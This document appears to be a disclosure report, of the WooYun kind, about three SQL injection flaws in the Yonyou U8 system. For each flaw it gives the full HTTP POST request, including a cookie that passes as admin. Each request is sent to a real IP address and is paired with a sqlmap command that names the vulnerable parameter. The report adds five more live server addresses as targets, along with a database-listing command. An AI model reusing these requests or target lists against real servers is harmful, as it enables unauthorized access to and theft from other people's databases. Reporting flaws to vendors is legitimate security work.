用友优普U8系统三处SQL注射漏洞

### 简要描述： 用友某系统两处SQL注射漏洞 ### 详细说明： 前面有人提交这系统的漏洞 ``` [WooYun: 用友优普U8某系统两处SQL注入(无需登录DBA权限83案例)](http://www.wooyun.org/bugs/wooyun-2015-0119763) ``` 搜索了好久终于找到了案例，于是乎漏洞来了。。。 总共三处漏洞， 0x01 SQL注入一 /Server/CmxUserGroup.php?pgid=Group_DelUserOK UserID=1&OrgID=1 ``` POST /Server/CmxUserGroup.php?pgid=Group_DelUserOK HTTP/1.1 Referer: http://218.27.137.242:8080/ Cookie: RAS_Admin_UserInfo_UserName=1 Host: 218.27.137.242:8080 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 16 UserID=1&OrgID=1 ``` sqlmap.py -r p1.txt -p OrgID --dbms mysql [<img src="https://images.seebug.org/upload/201507/06185322a6ff7d5517ea9a2cbedad3b22d08b4c8.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/06185322a6ff7d5517ea9a2cbedad3b22d08b4c8.png) 0x02 SQL注入二 /Server/CmxSecurity.php?pgid=Security_AddUser ``` POST /Server/CmxSecurity.php?pgid=Security_AddUser&SearchFlag=true HTTP/1.1 Referer: http://218.27.137.242:8080/ Cookie: RAS_Admin_UserInfo_UserName=1 Host: 218.27.137.242:8080 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 12 SecurityID=1 ``` sqlmap.py -r p1.txt -p SecurityID --dbms mysql [<img src="https://images.seebug.org/upload/201507/0619014899bf17be0e20203d25c0d50203d6f29d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0619014899bf17be0e20203d25c0d50203d6f29d.png) 0x03 SQL注入三 /Server/CmxServer.php?pgid=Server_UpdateSave ``` POST /Server/CmxServer.php?pgid=Server_UpdateSave HTTP/1.1 Referer: http://218.27.137.242:8080/ Cookie: RAS_Admin_UserInfo_UserName=1 Host: 218.27.137.242:8080 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 10 ServerID=1 ``` sqlmap.py -r p1.txt -p ServerID --dbms mysql [<img src="https://images.seebug.org/upload/201507/06190303d9029469ccac779049f17f6f3e5ec65e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/06190303d9029469ccac779049f17f6f3e5ec65e.png) 案例很多，随便给5个： http://218.27.137.242:8080/ http://222.177.213.190:8888/ http://117.132.15.88:8001/ http://221.224.116.210:81/ http://221.238.243.237:8000/ ### 漏洞证明： sqlmap.py -r p1.txt -p ServerID --dbms mysql --dbs [<img src="https://images.seebug.org/upload/201507/06191455ed1aeae8fddc4a34ed3e8f5b90b8295b.png" alt="a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/06191455ed1aeae8fddc4a34ed3e8f5b90b8295b.png)